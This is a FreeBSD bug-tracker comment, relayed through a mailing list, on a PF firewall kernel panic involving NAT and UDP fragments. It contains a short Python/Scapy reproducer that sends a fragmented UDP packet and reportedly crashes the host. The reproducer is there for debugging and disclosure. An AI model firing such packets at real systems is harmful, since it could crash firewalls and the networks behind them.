[Bug 288549] PF panic with NAT + UDP fragments

[email protected] Sat, 02 Aug 2025 10:57:08 +0000
Newsgroups gmane.os.freebsd.devel.pf4freebsd
Message-ID <[email protected]/bugzilla/>
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=288549

--- Comment #3 from Danilo Egea Gondolfo <[email protected]> ---
Hi,

here is a reproducer (Python + Scapy). I run this from a FreeBSD VM in bhyve
and my host goes kaboom:

from scapy.all import *

udp = UDP(dport=12345, sport=54321)
ip = IP(frag=123, dst="1.1.1.1")/udp

send(ip)

-- 
You are receiving this mail because:
You are the assignee for the bug.